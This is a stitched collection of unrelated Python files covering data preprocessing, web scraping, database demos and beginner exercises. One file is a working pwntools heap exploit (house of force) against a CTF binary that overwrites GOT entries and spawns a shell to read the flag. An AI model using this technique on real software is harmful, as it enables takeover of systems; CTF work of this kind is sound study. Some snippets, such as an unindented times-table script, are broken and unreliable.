    original_train_df = convert_to_categorical(original_train_df, dataset_name, fold_i)
    original_test_df = convert_to_categorical(original_test_df, dataset_name, fold_i)
    # --- Concatenate the train and test data for the current fold ----------------------------------------------------
    nb_of_train_examples = len(original_train_df)
    nb_of_test_examples = len(original_test_df)
    logger.info(f"Start concatenating train & test folds for {dataset_name}{fold_i}")
    original_concat_df = pd.concat([original_train_df, original_test_df], axis=0)
    if len(original_concat_df) != nb_of_train_examples + nb_of_test_examples:
        raise Exception("unexpected length")
    # --- Write out the full discretized dataset of this fold to file for inspection purposes -------------------------
    original_full_data_abs_file_name = get_original_full_data_abs_file_name(dataset_name, fold_i)
    logger.info(f"Writing out UN-encoded full dataset for {dataset_name}{fold_i}: {original_full_data_abs_file_name}")
    original_concat_df.to_csv(original_full_data_abs_file_name, index=False)
    # --- One-hot encoded the full data -------------------------------------------------------------------------------
    logger.info(f"Start one hot encoding {dataset_name}{fold_i}")
    one_hot_encoded_concat_df = pd.get_dummies(original_concat_df,
                                               prefix_sep=ohe_prefix_separator,
                                               drop_first=drop_first)
    one_hot_encoded_full_data_abs_file_name = get_one_hot_encoded_full_data_abs_file_name(dataset_name, fold_i)
    # --- Write out the one-hot encoded full data ---------------------------------------------------------------------
    logger.info(
        f"Writing out one hot encoded full dataset for {dataset_name}{fold_i}:"
        f" {one_hot_encoded_full_data_abs_file_name}")
    one_hot_encoded_concat_df.to_csv(one_hot_encoded_full_data_abs_file_name, index=False)
    # --- Create the EncodingBookKeeper and write it to file ----------------------------------------------------------
    encoding_book_keeper: EncodingBookKeeper = EncodingBookKeeper. \
        build_encoding_book_keeper_from_ohe_columns(one_hot_encoded_concat_df.columns,
                                                    ohe_prefix_separator=ohe_prefix_separator)
    logger.info(f"Creating one hot encoding book keeper for {dataset_name}{fold_i}")
    # %%
    encoding_book_keeper_abs_file_name = get_encodings_book_keeper_abs_file_name_for(dataset_name, fold_i)
    logger.info(f"Saving one hot encoding book keeper for {dataset_name}{fold_i}: {encoding_book_keeper_abs_file_name}")
    store_encoding_book_keeper(encoding_book_keeper_abs_file_name, encoding_book_keeper)
    # -- Split the full one-hot encoded dataset back into train and test ----------------------------------------------
    # Row order is preserved by pd.concat above, so slicing by count restores
    # the original train/test partition.
    one_hot_encoded_train_df = one_hot_encoded_concat_df[:nb_of_train_examples]
    one_hot_encoded_test_df = one_hot_encoded_concat_df[nb_of_train_examples:]
    if len(one_hot_encoded_train_df) != nb_of_train_examples:
        raise Exception("unexpected length")
    if len(one_hot_encoded_test_df) != nb_of_test_examples:
        raise Exception("unexpected length")
    # -- Write out the one-hot encoded train and test -----------------------------------------------------------------
    one_hot_encoded_train_abs_file_name = get_one_hot_encoded_data_fold_abs_file_name(dataset_name, fold_i,
                                                                                     TrainTestEnum.train)
    one_hot_encoded_test_abs_file_name = get_one_hot_encoded_data_fold_abs_file_name(dataset_name, fold_i,
                                                                                    TrainTestEnum.test)
    logger.info(f"Saving one hot encoded train fold: {one_hot_encoded_train_abs_file_name}")
    logger.info(f"Saving one hot encoded test fold: {one_hot_encoded_test_abs_file_name}")
    one_hot_encoded_train_df.to_csv(one_hot_encoded_train_abs_file_name, index=False)
    one_hot_encoded_test_df.to_csv(one_hot_encoded_test_abs_file_name, index=False)
    logger.info("---")
    close_logger(logger)
def main():
    """One-hot encode every fold of every configured ARC-bench dataset."""
    # from project_info import project_dir
    prefix_separator = ":=:"  # separator between column name and value in OHE column names
    from experiments.arcbench_data_preparation.dataset_info import datasets
    # datasets = [dict(filename='labor')]
    nb_of_folds: int = 10
    for dataset_info in datasets:
        dataset_name = dataset_info['filename']
        # for dataset_name in ['australian', 'autos', 'credit-g', 'heart-statlog', 'ionosphere', 'segment', 'spambase']:
        for fold_i in range(nb_of_folds):
            one_hot_encode_dataset_fold(dataset_name, fold_i, ohe_prefix_separator=prefix_separator)
if __name__ == '__main__':
    main()
|
import os
import django
import requests
from datetime import datetime
from bs4 import BeautifulSoup
from my_app.models import Stats,News
def populate_stat():
    """Scrape worldometers' global COVID counters and store one Stats row."""
    # NOTE(review): DJANGO_SETTINGS_MODULE/django.setup() usually must run
    # before models are imported at module top — confirm the import order works.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE','corona.settings')
    django.setup()
    url = "https://www.worldometers.info/coronavirus/"
    page = requests.get(url)
    soup = BeautifulSoup(page.content,'html.parser')
    # The "maincounter-number" divs hold total cases, deaths, recoveries.
    spans = soup.findAll('div',{'class':'maincounter-number'})
    lis = []
    for i in spans:
        lis.append((i.find('span').text))
    print('table1 updating ..... ... ...')
    s = Stats.objects.get_or_create(total_cases=lis[0],deaths=lis[1],recovered_cases=lis[2],new_date=datetime.now())[0]
    s.save()
    print('table1 updated......')
def populate_news():
    """Scrape India Today's COVID-19 headline list and store News rows."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE','corona.settings')
    django.setup()
    url = "https://www.indiatoday.in/coronavirus-covid-19-outbreak?page=&view_type=list"
    page = requests.get(url)
    soup = BeautifulSoup(page.content,'html.parser')
    contain = soup.findAll('div',{'class':'detail'})
    news= []
    links = []
    for i in contain:
        a = i.find('a')
        # Article links are site-relative; prefix the host.
        href = 'https://www.indiatoday.in'+ a['href']
        news.append(i.text)
        links.append(href)
    print('table2 updating ..... ... ...')
    for i in range(len(news)):
        # get_or_create keeps re-runs from duplicating headlines.
        n = News.objects.get_or_create(headline=news[i],link=links[i])[0]
        n.save()
    print('table2 updated......')
|
# House-of-force exploit for the "bcloud" heap challenge (Python 2 / pwntools).
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = process("./bcloud")
#p = remote("training.jinblack.it", 2016)
gdb.attach(p, '''
#b *0x08048978
b *0x08048a19
b *0x8048a8c''')
context.log_level = 'debug'
f = elf.ELF('./bcloud')
libc = elf.ELF('./libc-2.27.so')
raw_input("Wait")
# Addresses of interest in the target binary.
readGot = 0x0804b00c
freeGot = 0x0804b014
atoiGot = 0x0804b03c
arrayDimNote = 0x0804b0a0   # global array of note sizes
printfPlt = 0x080484d0
def insertName():
    # Fill the name buffer completely (no terminating NUL) so the heap
    # pointer stored right after it leaks when the name is echoed back.
    p.recvuntil("Input your name:")
    p.send("A"*0x3f + "B")
def insertOrg():
    p.recvuntil("Org:")
    p.send("C"*0x40)
def insertHost():
    # Overflows into the top chunk header, setting its size to 0xffffffff.
    p.recvuntil("Host:")
    p.sendline("DDDD" + "EEEE" + p32(0xffffffff))
def newNote(size, content):
    p.sendline("1")
    p.recvuntil("content:")
    p.sendline("%d" % size)
    p.recvuntil("content:")
    if size > 0:
        p.sendline(content)
def editNote(id_, content):
    p.sendline("3")
    p.recvuntil("id:")
    p.sendline("%d" % id_)
    p.recvuntil("content:")
    p.sendline(content)
def deleteNote(id_):
    p.sendline("4")
    p.recvuntil("id:\n")
    p.sendline("%d" %id_)
    return u32(p.recv(4))
insertName()
p.recvuntil("B")
leak = u32(p.recv(4))
print "LEAK: %#x" % leak
insertOrg()
time.sleep(0.1)
insertHost() # overwrite the top_chunk size with 0xffffffff
# leaked address of the name buffer: 0x0804c160
# top_chunk address after org: 0x0804c258
heapBase = leak - 0x160
topChunk = heapBase + 0x25c
print "HeapBase: %#x" % heapBase
print "topChunk: %#x" % topChunk
# House of force: size the next allocation so the following one lands on
# the note-size array in .bss.
toMalloc = arrayDimNote - topChunk - 18
newNote(toMalloc, "")
payload = p32(4)*10
payload += "\x00"*(0x0804b120 - 0x0804b0a0 - 10 - 30)
payload += p32(freeGot)   # note 0 pointer -> free@got
#payload += p32(freeGot)
#payload += "ls"
payload += p32(atoiGot)   # note 1 pointer -> atoi@got
newNote(len(payload), payload) # writes starting from arrayDimNote 0x0804b0a0
editNote(0, p32(printfPlt))   # free@got -> printf@plt: "delete" now leaks pointers
atoi_libc = deleteNote(1)
print "atoi_libc: %#x" % atoi_libc
libc_base = atoi_libc - libc.symbols['atoi']
systemAddr = libc_base + libc.symbols['system']
print "libc_base: %#x" % libc_base
print "systemAddr: %#x" % systemAddr
editNote(0, p32(systemAddr))  # free@got -> system
sh = "/bin/sh\x00"
ls = "ls"
cat_flag = "cat flag"
newNote(len(sh), sh)
newNote(len(cat_flag), cat_flag)
newNote(len(ls), ls)
deleteNote(2)   # free(note 2) => system("/bin/sh")
#p.recvuntil("id:\n")
#p.sendline("ls")
# before the Deleted message we get f7e09b40 when deleting 1 --> atoi_libc
# before the Deleted message we get 080484d0 when deleting 0
p.interactive()
# -*- coding:utf-8 -*-
# -------------------------------
# ProjectName : autoDemo
# Author : zhangjk
# CreateTime : 2020/6/23 20:32
# FileName : 2
# Description :
# --------------------------------
def gys(a,b):
    """Print and return the greatest common divisor of a and b (Euclid's algorithm).

    The print is kept for backward compatibility with existing callers; the
    return value is new so the result can also be used programmatically.
    """
    if a < b:
        b,a = a,b
    while a%b!=0:
        a,b = b,a%b
    print(b)
    return b
# Sample ages used by the filter demo below.
ages = [5, 16, 19, 22, 26, 39, 45]
def myFunc(x):
    """Predicate for filter(): True when x is an adult (>= 18). Prints each probe."""
    print('x..', x)
    return x >= 18
def f2():
    """Print every adult age, demonstrating filter() with a predicate."""
    for adult_age in filter(myFunc, ages):
        print(adult_age)
def Power(x,n):
    """Return x raised to the non-negative integer power n by repeated multiplication."""
    result = 1
    for _ in range(n):
        result *= x
    return result
def main():
    """Entry point: currently only runs the Power demo."""
    # gys(12,15)
    # f2()
    print(Power(2,3))
if __name__ == '__main__':
    main()
# -*-coding:utf-8-*-
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_assets import Environment
# Unbound extension instances; each is bound to the app later via
# init_app() in the application factory.
db = SQLAlchemy()
mail = Mail()
assets_env = Environment()
|
import random
num = int(input())
lst = random.sample(range(1, 20), 10)
# PRE: `num` is an integer, `lst` is a list of integers of size N > 0
i = 0
num_found = False
# INVARIANT: i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
# AFTER INITIALIZATION: `i` == 0 and `num_found` == False, `num` not in {} (empty list) => OK
while i < len(lst):
    # INVARIANT: i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
    # AND
    # i < len(lst)
    if lst[i] == num:
        num_found = True
    # So:
    # i < len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i}, otherwise `num_found` == True
    i += 1
    # i <= len(lst), `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_i-1}, otherwise `num_found` == True
    # So:
    # INVARIANT is maintained
# After TERMINATION:
# INVARIANT holds
# AND
# i >= len(lst)
# So:
# `num_found` == False if `num` not in {lst_0, lst_1, ..., lst_(len(lst)-1)}, otherwise `num_found` == True
# => POST CONDITION
# FINITENESS:
# - VARIANT: N - `i`
# - LOWER BOUND: `i` is at most equal to
#   N due to the loop condition, at that point the variant is
#   equal to 0: the lower bound of the variant
# - MONOTONIC DECREASE: at each iteration, `i` is increased by exactly 1
#   and the length of lst is constant.
#   Therefore, the variant N - `i` decreases by exactly one.
# - FINITE NUMBER OF DECREMENTS: since the variant decreases
#   monotonically by one at each iteration and N is constant,
#   the lower bound will be reached at which point the loop ends.
# POST: `num_found` == True if `num` ∈ `lst`, otherwise `num_found` == False
if (num_found): print("Number " + str(num) + " was found in list " + str(lst))
else: print("Number " + str(num) + " was not found in list " + str(lst))
from enum import Enum
class Dir(Enum):
    """Heading of the virus carrier on the grid."""
    UP = 0
    DOWN = 1
    LEFT = 2
    RIGHT = 3
class State(Enum):
    """Infection state of a grid node (WEAKENED/FLAGGED are used only in part 2)."""
    CLEAN = 0
    WEAKENED = 1
    INFECTED = 2
    FLAGGED = 3
# Clockwise ordering, so an index shift of +1 is a right turn.
DIR_ORDER = [Dir.UP, Dir.RIGHT, Dir.DOWN, Dir.LEFT]
def turn(dir, diff):
    # Rotate `dir` by `diff` quarter-turns clockwise (negative = counter-clockwise).
    return DIR_ORDER[(DIR_ORDER.index(dir) + diff) % len(DIR_ORDER)]
def turn_left(dir):
    return turn(dir, -1)
def turn_right(dir):
    return turn(dir, +1)
def reverse_dir(dir):
    return turn(dir, +2)
def move(dir, x, y):
    """Return the coordinates one step from (x, y) in direction `dir`.

    Screen coordinates: y grows downwards, so UP decrements y.
    """
    if dir == Dir.LEFT:
        return x - 1, y
    if dir == Dir.RIGHT:
        return x + 1, y
    if dir == Dir.UP:
        return x, y - 1
    if dir == Dir.DOWN:
        return x, y + 1
def run_virus(states, pos, dir, bursts):
    """Part 1: run `bursts` steps of the two-state virus; return infections caused.

    `states` maps (x, y) -> State and is mutated in place; absent keys mean CLEAN.
    """
    num_infected = 0
    for _ in range(bursts):
        if states.get(pos, State.CLEAN) == State.INFECTED:
            # Infected node: turn right and clean it.
            dir = turn_right(dir)
            del states[pos]
        else:
            # Clean node: turn left and infect it.
            dir = turn_left(dir)
            states[pos] = State.INFECTED
            num_infected += 1
        pos = move(dir, *pos)
    return num_infected
def run_virus_pt2(states, pos, dir, bursts):
    """Part 2: four-state virus (clean -> weakened -> infected -> flagged -> clean)."""
    num_infected = 0
    for _ in range(bursts):
        node_state = states.get(pos, State.CLEAN)
        if node_state == State.CLEAN:
            dir = turn_left(dir)
            states[pos] = State.WEAKENED
        elif node_state == State.WEAKENED:
            # No turn; the node becomes infected.
            states[pos] = State.INFECTED
            num_infected += 1
        elif node_state == State.INFECTED:
            dir = turn_right(dir)
            states[pos] = State.FLAGGED
        elif node_state == State.FLAGGED:
            dir = reverse_dir(dir)
            del states[pos]
        pos = move(dir, *pos)
    return num_infected
def main():
    """Build the initial grid and report infection counts for both parts."""
    #with open('day22.input.txt') as f:
    #    grid = [[c == '#' for c in line.strip()] for line in f.readlines()]
    grid = [[False, False, True], [True, False, False], [False, False, False]]
    height = len(grid)
    width = len(grid[0])
    pos = (width // 2, height // 2)  # carrier starts at the centre, facing up
    dir = Dir.UP
    initial_states = {}
    for y, row in enumerate(grid):
        for x, infected in enumerate(row):
            if infected:
                initial_states[(x, y)] = State.INFECTED
    # BUG FIX: both parts previously shared one `states` dict, so part 2 ran
    # on whatever grid part 1 left behind instead of the original input.
    # Give each run its own copy of the initial state.
    print(run_virus(dict(initial_states), pos, dir, 10000))
    print(run_virus_pt2(dict(initial_states), pos, dir, 100))
|
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
def reverse(number):
    """Return the digits of a non-negative integer in reverse order.

    Generalized: the original hand-unrolled version only handled exactly
    three digits, while main() prompts for a four digit number. String
    reversal works for any digit count; leading zeros of the reversal are
    dropped by int(), matching the old behaviour for 3-digit inputs.
    """
    return int(str(number)[::-1])
def is_palindrome(number):
    """Return a human-readable verdict on whether `number` reads the same reversed."""
    if reverse(number) == number:
        return 'This is a palindrome'
    return 'This is not a palindrome'
def main():
    """Prompt for an integer and report whether it is a palindrome."""
    # SECURITY FIX: eval(input(...)) executes arbitrary expressions typed by
    # the user; int() parses the expected numeric input safely.
    number_test = int(input("Enter a four digit number to test if it's a palindrome: "))
    print(is_palindrome(number_test))
main()
import random
import redis
from configs import products
def main():
    # Populate a throwaway redis db with random product sets and demo
    # set-intersection / set-union queries (Python 2 script).
    r = redis.client.StrictRedis(db=0)
    r.flushdb()  # start from an empty database on each run
    list_products = products
    random.shuffle(products)
    product_men = products[0:400]
    random.shuffle(products)
    product_brand1 = products[0:200]
    product_brand2 = products[200:400]
    random.shuffle(products)
    product_blue = products[0:100]
    # Batch all SADDs through one pipeline round-trip.
    pipe = r.pipeline()
    [pipe.sadd('products', x) for x in list_products]
    [pipe.sadd('products:men', x) for x in product_men]
    [pipe.sadd('products:brand1', x) for x in product_brand1]
    [pipe.sadd('products:brand2', x) for x in product_brand2]
    [pipe.sadd('products:color:blue', x) for x in product_blue]
    pipe.execute()
    print 'INTER EXAMPLE'
    print "========" * 5
    result = r.sinter(['products', 'products:men', 'products:color:blue'])
    print 'total product : %s' % len(result)
    print result
    print '\n' * 4
    print 'UNION EXAMPLE'
    print "========" * 5
    r.sunionstore('union:brand1:brand2', ['products:brand1', 'products:brand2'])
    result2 = r.sinter(['products', 'products:men', 'union:brand1:brand2', 'products:color:blue'])
    print 'total product : %s' % len(result2)
    print result2
if __name__ == '__main__':
    main()
import pymongo
import datetime
import os
def get_result(f,t,s,r):
    """Rank areas by how well they match the requested grade thresholds and
    write crime statistics for the top-5 areas to TSV/CSV files for the UI.

    :param f: minimum food grade
    :param t: minimum transport grade
    :param s: minimum safety grade
    :param r: minimum rent grade
    :return: all areas sorted by rating, annotated with map corner coordinates
    """
    client = pymongo.MongoClient()
    repo = client.repo
    repo.authenticate('minteng_tigerlei_zhidou', 'minteng_tigerlei_zhidou')
    # user will set the grade they want
    transport=t
    food=f
    safety=s
    rent=r
    #find the fitted area
    def if_fitted(A,requirement):#[t,f,s,r] is the requirement/standard
        # True when every grade in A meets or exceeds the requirement.
        [t1,f1,s1,r1]=A
        [t,f,s,r]=requirement
        if r1=='Not found':
            return False
        if t1>=t and f1>=f and s1>=s and r1>=r:
            return True
        return False
    def get_dist(A,requirement):
        # Euclidean distance between an area's grades and the requirement;
        # areas with unknown rent get a large penalty distance.
        [t1,f1,s1,r1]=A
        [t,f,s,r]=requirement
        if r1=='Not found':
            return 1000
        return ((t1-t)**2+(f1-f)**2+(s1-s)**2+(r1-r)**2)**0.5
    res=[]
    a=repo['minteng_tigerlei_zhidou.box_count'].find()
    for i in a:
        grade1=[i['grade']['transport'],i['grade']['food'],i['grade']['safety'],i['grade']['rent']]
        if if_fitted(grade1,[transport,food,safety,rent]):
            # Fitted areas are rated by their total grade (higher is better).
            temp=i
            temp['rating']=sum(i['grade'].values())
            res.append(temp)
        else:
            # Unfitted areas get a negative rating so they sort below all
            # fitted areas, ordered by closeness to the requirement.
            temp=i
            temp['rating']=get_dist(grade1,[transport,food,safety,rent])*-1
            res.append(temp)
    #return top fitted
    result=sorted(res, key=lambda x: x['rating'], reverse=True)
    top5 = result[0:5]
    for i in range(5):
        top5[i]['rank'] = i + 1
    # get crime num
    crimeCount=[]
    crimeTotal=[]
    # NOTE(review): `max` shadows the builtin for the rest of this function.
    max = 0
    b=repo['minteng_tigerlei_zhidou.crimeCount'].find()
    for i in b:
        tempT = {}
        tempT['label'] = i['area'] + "(" + str(i['_id']) + ")"
        tempT['emp'] = sum(i['crimeNum'])
        tempT['area'] = i['_id']
        tempT['ind'] = "crimeNum"
        max = tempT['emp'] if tempT['emp'] > max else max
        crimeTotal.append(tempT)
        for j in top5:
            if (j['box'] == i['box']):
                temp = {}
                temp['crimeRatio'] = i['crimeRatio']
                temp['bracket'] = j['rank']
                temp['area'] = j['area']
                crimeCount.append(temp)
    output=sorted(crimeCount, key=lambda x: x['bracket'])
    curpath = os.path.abspath(os.curdir)
    # 48 months of data: 2013-2016 inclusive.
    with open(os.path.join(curpath, 'static/top5.tsv'), 'w') as f:
        f.write('year\tbracket\tcrimeRatio\n')
        for i in range(48):
            year = 2013 + i // 12
            for block in output:
                f.write(str(year) + '\t' + str(block['bracket']) + '\t' + str(block['crimeRatio'][i]) + '\n')
    with open(os.path.join(curpath, 'static/top5Name.tsv'), 'w') as f:
        f.write('1\t2\t3\t4\t5\n')
        for block in output:
            f.write(str(block['bracket']) + ': ' +block['area'] + '\t')
    # crimeTotal.csv is written once and then reused across runs.
    if not os.path.exists(os.path.join(curpath, 'static/crimeTotal.csv')):
        with open(os.path.join(curpath, 'static/crimeTotal.csv'), 'w') as f:
            f.write("area,label,ind,emp\n")
            for i in crimeTotal:
                f.write(str(i['area']) + ',' + i['label'] + ',' + i['ind'] + ',' + str(i['emp']) + '\n')
                f.flush()
            for i in crimeTotal:
                f.write(str(i['area']) + ',' + i['label'] + ',' + "Difference with Max" + ',' + str(max - i['emp']) + '\n')
                f.flush()
    # for mapping
    for i in result:
        i['center']=[(i['box'][0][0]+i['box'][1][0])/2,(i['box'][0][1]+i['box'][1][1])/2]
    for i in result:
        i['leftdown']=[i['box'][0][0],i['box'][0][1]]
        i['leftup']=[i['box'][0][0],i['box'][1][1]]
        i['rightdown']=[i['box'][1][0],i['box'][0][1]]
        i['rightup']=[i['box'][1][0],i['box'][1][1]]
    return result
get_result(3,4,3,4)
|
from wave_app import db
class User(db.Model):
    """Application user; owns zero or more wave Search records."""
    __tablename__ = 'User'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), nullable=False)
    # NOTE(review): presumably a password hash — confirm it is never plaintext.
    password = db.Column(db.String, nullable=False)
    # User level/tier; exact semantics not visible from this file.
    level = db.Column(db.String(15), nullable=False)
    # Deleting a user removes their searches as well (delete-orphan cascade).
    waves = db.relationship('Search', backref='User', cascade='all,delete-orphan')
class Search(db.Model):
    """One saved wave-conditions lookup belonging to a User."""
    __tablename__ = 'Search'
    id = db.Column(db.Integer, primary_key=True)
    date = db.Column(db.Date)
    time = db.Column(db.Integer)
    # Wave measurements; units/semantics not visible here — presumably
    # avg = average height, hg = high value, sec = period in seconds (confirm).
    avg = db.Column(db.Float, nullable=False)
    hg = db.Column(db.Float, nullable=False)
    sec = db.Column(db.Float, nullable=False)
    user_id = db.Column(db.Integer, db.ForeignKey('User.id'))
|
# Assignment_1, 11 Aug 14, 05:09
__author__ = 'subin'
# Function For Addition
def Addition(First_Input,Second_Input):
    """Return the sum of the two inputs."""
    return First_Input + Second_Input
# Function For Subtraction
def Subtraction(First_Input,Second_Input):
    """Return First_Input minus Second_Input."""
    return First_Input - Second_Input
# Function For Multiplication
def Multiplication(First_Input,Second_Input):
    """Return the product of the two inputs."""
    return First_Input * Second_Input
# Function For Division
def Division(First_Input,Second_Input):
    """Return [quotient, remainder] of integer division.

    BUG FIX: the original used `/`, which under Python 3 is true division
    and produced a float "quotient"; divmod yields the floor quotient and
    remainder consistently on both Python 2 and 3.
    """
    quotient, remainder = divmod(First_Input, Second_Input)
    return [quotient, remainder]
# Read first number (NOTE: this is a Python 2 script — input() evaluates the
# typed expression, which is how numeric values come back here).
First_Input = input('Give your first input: ')
# Read second number
Second_Input = input('Give your second input: ')
# Call function Addition
Sum = Addition(First_Input, Second_Input)
# Call function Subtraction
Diff = Subtraction(First_Input, Second_Input)
# Call function Multiplication
Prod = Multiplication(First_Input, Second_Input)
# Call function Division
Quot = Division(First_Input, Second_Input)
# Print sum
print 'Sum of {0} and {1} is {2}.'.format(First_Input, Second_Input, Sum)
# Print difference
print 'Difference of {0} and {1} is {2}.'.format(First_Input, Second_Input, Diff)
# Print product
print 'Product of {0} and {1} is {2}.'.format(First_Input, Second_Input, Prod)
# Print quotient and reminder
print 'Quotient of {0} and {1} is {2} and reminder is {3}.'.format(First_Input, Second_Input, Quot[0], Quot[1])
|
__copyright__ = """\
(c). Copyright 2008-2020, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
import os, sys
from vyperlogix import misc
def killProcByPID(pid,isVerbose=False):
    """Terminate the process with the given pid (Python 2 module).

    On win32 the process is opened and terminated through the Win32 API
    (with a ctypes fallback); elsewhere a SIGTERM is sent via os.kill.
    :param pid: numeric process id to kill
    :param isVerbose: when True, trace progress to stderr
    """
    info_string = ''
    if (isVerbose):
        print >>sys.stderr, '(%s) :: sys.platform is "%s".' % (misc.funcName(),sys.platform)
    if (sys.platform == 'win32'):
        def kill(pid):
            # Windows path: open a handle with terminate rights, then try
            # win32api first and ctypes/kernel32 as a fallback.
            info_string = ''
            from vyperlogix.win import WinProcesses
            p = WinProcesses.WinProcesses()
            proc_handle = p.openProcessTerminateForPID(pid)
            if (isVerbose):
                print >>sys.stderr, '(%s) :: proc_handle is "%s".' % (misc.funcName(),proc_handle)
            if (proc_handle):
                try:
                    import win32api
                    win32api.TerminateProcess(proc_handle, -1)
                except Exception as details:
                    from vyperlogix.misc import _utils
                    info_string += _utils.formattedException(details=details)
                    try:
                        import ctypes
                        ctypes.windll.kernel32.TerminateProcess(proc_handle, -1)
                    except Exception as details:
                        from vyperlogix.misc import _utils
                        info_string += _utils.formattedException(details=details)
                        print >>sys.stderr, 'ERROR: Cannot Kill the process with pid of %s due to a system error.' % (pid)
                        print >>sys.stderr, info_string
                finally:
                    p.closeProcessHandle(proc_handle)
        if (isVerbose):
            print >>sys.stderr, '(%s) :: kill(%d).' % (misc.funcName(),pid)
        kill(pid)
    else:
        try:
            # BUG FIX: os.kill requires a signal argument; the original
            # os.kill(pid) always raised TypeError. Send SIGTERM.
            import signal
            os.kill(pid, signal.SIGTERM)
        except Exception as details:
            from vyperlogix.misc import _utils
            info_string += _utils.formattedException(details=details)
            print >>sys.stderr, 'ERROR: Cannot kill the process !'
            print >>sys.stderr, info_string
    if (isVerbose):
        print >>sys.stderr, '(%s) :: info_string is "%s".' % (misc.funcName(),info_string)
if __name__ == "__main__":
    # Running the module directly only prints the copyright notice.
    import sys
    print >>sys.stdout, __copyright__
    print >>sys.stderr, __copyright__
|
class Node:
    """Singly-linked node holding one value for the stack."""
    def __init__(self, inputVal):
        self.value = inputVal
        self.next = None  # next node down the stack


class Stack:
    """Linked-list stack. push() returns self for chaining; pop() returns the
    popped value, or (after printing a warning) self when the stack is empty —
    a quirk preserved for backward compatibility."""
    def __init__(self):
        self.top = None  # Node at the top of the stack, or None when empty
    def push(self, value):
        """Push `value` onto the stack; return self for chaining."""
        newnode = Node(value)
        # Idiom fix: compare against None with `is`.
        if self.top is None:
            self.top = newnode
        else:
            newnode.next = self.top
            self.top = newnode
        return self
    def pop(self):
        """Remove and return the top value; print a warning and return self
        when the stack is empty."""
        if self.top is not None:
            topvalue = self.top.value
            self.top = self.top.next
            return topvalue
        print("nothing to pop aka you got no pancakes")
        return self
    def size(self):
        """Return the number of items. (Also prints the count, except for an
        empty stack — behaviour preserved from the original.)"""
        if self.top is None:
            return 0
        count = 0
        runner = self.top
        while runner is not None:
            count += 1
            runner = runner.next
        print(count)
        return count
def compareStacks(stack1, stack2):
    """Return True when both stacks hold the same values in the same order.

    BUG FIX: the original compared the Node objects themselves
    (runner1 != runner2), so two distinct stacks with equal contents never
    matched unless they literally shared nodes; compare the stored values.
    """
    if stack1 is None or stack2 is None:
        return False
    if stack1.size() != stack2.size():
        return False
    runner1 = stack1.top
    runner2 = stack2.top
    while runner1 is not None:
        if runner1.value != runner2.value:
            return False
        runner1 = runner1.next
        runner2 = runner2.next
    return True
|
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import glob, os, sys
import xml.etree.ElementTree as ET
import math
STEP = 8  # keep every STEP-th pixel row/column -> roughly 1/STEP downscale
# The path in the console arguments.
path = sys.argv[1]
# Pair up images and their PASCAL-VOC-style XML annotations by sorted name.
imgs= sorted(glob.glob(os.path.join(path, '*.jpg')) + glob.glob(os.path.join(path, '*.JPG')))
xmls = sorted(glob.glob(os.path.join(path, '*.xml')) + glob.glob(os.path.join(path, '*.XML')))
for i in range(len(imgs)):
    print(imgs[i])
    img = mpimg.imread(imgs[i])
    # Larger of the two original dimensions, used to derive the scale ratio.
    size_orignal = img.shape[0] if img.shape[0] > img.shape[1] else img.shape[1]
    # Subsample rows then columns, overwriting the image file in place.
    img = img[list(range(0, img.shape[0], STEP)),:,:]
    img = img[:,list(range(0, img.shape[1], STEP)),:]
    mpimg.imsave(imgs[i], img)
    tree = ET.parse(xmls[i])
    root = tree.getroot()
    # NOTE(review): ratio mixes the larger ORIGINAL dimension with the new
    # HEIGHT — presumably meant to equal STEP; confirm for landscape images.
    ratio = math.ceil(size_orignal / img.shape[0])
    # Rewrite the annotation's image size and scale every bounding box.
    for size in root.iter('size'):
        size.find('width').text = str(img.shape[1])
        size.find('height').text = str(img.shape[0])
    for box in root.iter('bndbox'):
        x = str(int(box.find('xmin').text) // ratio)
        box.find('xmin').text = x
        y = str(int(box.find('ymin').text) // ratio)
        box.find('ymin').text = y
        x = str(int(box.find('xmax').text) // ratio)
        box.find('xmax').text = x
        y = str(int(box.find('ymax').text) // ratio)
        box.find('ymax').text = y
    tree.write(xmls[i])
|
"""Make a time table acript that ask user the following things:
1- how many tables you want to print
2- what should be user starting point
3 = ending point point of table
NOTE: tables should be print horizentally """
if __name__ == "__main__":
table_no = int(input('Enter table no: '))
start = int(input('starting point of table: '))
end = int(input('Ending point of table: '))
for i in range(start, end + 1):
for table in range(1, table_no + 1):
print(f"{table} x {i} = {table_no * i} ", end='\t')
print()
|
import numpy as np
# Simple amortization example: first-period principal and interest shares.
interestRate = 0.07          # annual nominal interest rate
numberOfMonths = 25*12;      # 25-year loan, monthly periods
principalBorrowed = 3500000
# NOTE(review): np.ppmt/np.ipmt were deprecated in NumPy 1.18 and removed in
# 1.20; on modern NumPy these live in the numpy_financial package.
principal2Pay = np.ppmt(interestRate/12, 1, numberOfMonths, principalBorrowed);
interest2Pay = np.ipmt(interestRate/12, 1, numberOfMonths, principalBorrowed);
print("Loan amount:%7.2f"%principalBorrowed);
print("Loan duration in months:%d"%numberOfMonths);
print("Annual Interest Rate in percent:%2.2f"%(interestRate*100));
